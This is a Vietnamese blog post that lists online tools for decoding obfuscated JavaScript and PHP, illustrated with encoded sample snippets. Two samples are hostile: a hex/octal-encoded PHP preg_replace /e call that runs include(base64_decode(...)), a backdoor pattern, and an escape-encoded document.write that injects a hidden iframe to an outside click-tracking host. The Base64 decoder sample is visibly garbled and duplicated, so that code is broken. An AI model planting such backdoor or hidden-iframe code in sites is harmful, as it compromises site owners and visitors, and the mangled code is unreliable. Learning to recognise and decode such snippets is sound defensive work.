Thursday, October 15, 2015

Những trang web giải mã code Javascript

Nhận biết mã gặp phải đã được mã hoá dưới dạng gì:

Bạn ơi, hãy nhấn vào link quảng cáo để ủng hộ blog duy trì hoạt động nhé. :)
Một cách nhận biết nhỏ nhằm gợi ý cho bạn dễ dàng tìm kiếm các công cụ bẻ khoá cho các đoạn code gặp phải. Lưu ý, việc làm này có thể dẫn bạn vướng vào các vấn đề pháp lý.

Nhờ vào sự giúp đỡ của trang DDecode, KTHEME liệt kê dưới đây (có thể cập nhật thường xuyên) một số dạng cơ bản. Bạn có thể tham khảo ở dưới để biết một số trang web hỗ trợ giải mã.

► Nếu bạn gặp đoạn code kiểu như dưới đây, đó là đoạn mã phd đã được mã hoá bởi mã Hex và Octa trộn lẫn. Bạn có thể vào trang này để giải mã.
<'? php @preg_replace("\x40\50\x2e\53\x29\100\x69\145","\x69\156\x63\154\x75\144\x65\50
\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65\50\x22\134\x31\42\x29\51\x3b","\x4c\62
\x68\166\x62\127\x55\166\x59\62");
► Nếu bạn gặp đoạn code sau, nó là đoạn JavaScript đã được mã hoá để ấn đi các iframe (Escape Encoding). Bạn có thể vào trang này hoặc trang này để giải mã
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%73%
3A%2F%2F%64%6F%63%73%2E%67%6F%6F%67%6C%65%2E%63%6F%6D%2F%66%69%6C%65%2F%64%2F%30
%42%32%4C%38%53%54%30%51%44%76%4F%6A%52%30%74%76%5A%58%5A%33%61%6B%35%70%54%56%6
B%2F%70%72%65%76%69%65%77%22%20%77%69%64%74%68%3D%22%36%37%30%22%20%68%65%69%67%
68%74%3D%22%34%35%30%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
► Hoặc đoạn code sau nghĩa là nhiều iframes được mã hoá thông qua chế độ document.write (Escape Encoding).. Bạn có thể vào trang này hoặc trang này để giải mã
document.write(unescape('%3C%64%69%76%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%
79%3A%6E%6F%6E%65%22%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F
%2F%63%6C%69%63%6B%2E%6B%38%38%37%37%2E%6F%72%67%2F%66%65%65%64%2F%78%6D%6C%2E%7
0%68%70%3F%75%69%64%3D%32%33%30%22%3E%3C%2F%69%66%72%61%6D%65%3E%3C%69%66%72%61%'))
► Đoạn code sau là mã hoá của câu "Hello World!" theo chuẩn Root13 Encoding.
function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26)})}document.write(rot13("Uryyb Jbeyq!"));
► Đoạn code sau là mã hoá của câu "Hello World!" theo chuẩn Base64 Encoding. Bạn có thể dùng trang web này để giải mã.
function decode64(input){var base64="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var output="";var ch1,ch2,ch3,enc1,enc2,enc3,enc4;var i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{enc1=base64.indexOf(input.charAt(i++));enc2=base64.indexOf(input.charAt(i++));enc3=base64.indexOf(input.charAt(i++));enc4=base64.indexOf(input.charAt(i++));ch1=(enc1<<2 enc2="">>4);ch2=((enc2&15)<<4 enc3="">>2);ch3=((enc3&3)<<6 decode64="" document.write="" enc1="" enc2="" enc3="" enc4="" i="" input.length="" output="" p="" return="" sbg8gv29ybgqh="" while="">

function decode64(input){var base64="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var output="";var ch1,ch2,ch3,enc1,enc2,enc3,enc4;var i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{enc1=base64.indexOf(input.charAt(i++));enc2=base64.indexOf(input.charAt(i++));enc3=base64.indexOf(input.charAt(i++));enc4=base64.indexOf(input.charAt(i++));ch1=(enc1<<2 enc2="">>4);ch2=((enc2&15)<<4 enc3="">>2);ch3=((enc3&3)<<6 decode64="" document.write="" enc1="" enc2="" enc3="" enc4="" i="" input.length="" output="" p="" return="" sbg8gv29ybgqh="" while="">
► PhP encode - Bạn có thể xem ví dụ về 3 loại code liên quan đến phương thức này ở trang web này. Cách giải mã ở trang web này.
Giải mã những đoạn code Javascript là những đoạn code đã được mã hóa khiến bạn không thể sửa đổi chúng nên phải giải mã chúng:
codehack(1)

  1. http://dean.edwards.name/unpacker : trang này hoạt động khá hiệu quả, với những template blogger từ trang ThemeXpose. Lưu ý khi giải mã, bạn chỉ copy những đoạn code đã được mã hoá, sau đó giải mã từng đoạn một, không nên copy tất cả.
  2. http://jsbeautifier.org : trang này vừa giải mã vừa có chức năng làm đẹp cho đoạn JS quá dài dòng và rối rắm.
  3. http://ddecode.com/hexdecoder : chuyển giải các mã HTML/Hexa/Octa. 
  4. http://closure-compiler.appspot.com/home 
  5. http://base64decode.net : trang này chuyên chuyển các mã dựa trên base64 encoding. 
  6. http://www.strictly-software.com/unpack-javascript 
  7. đang cập nhật....
Lưu ý, bài viết này có thể sẽ làm bạn vướng đến những vấn đề pháp lý khi bạn cố tình giải mã những đoạn code thương mại. Chúng chỉ mang tính chất tham khảo là chính.

1 comment: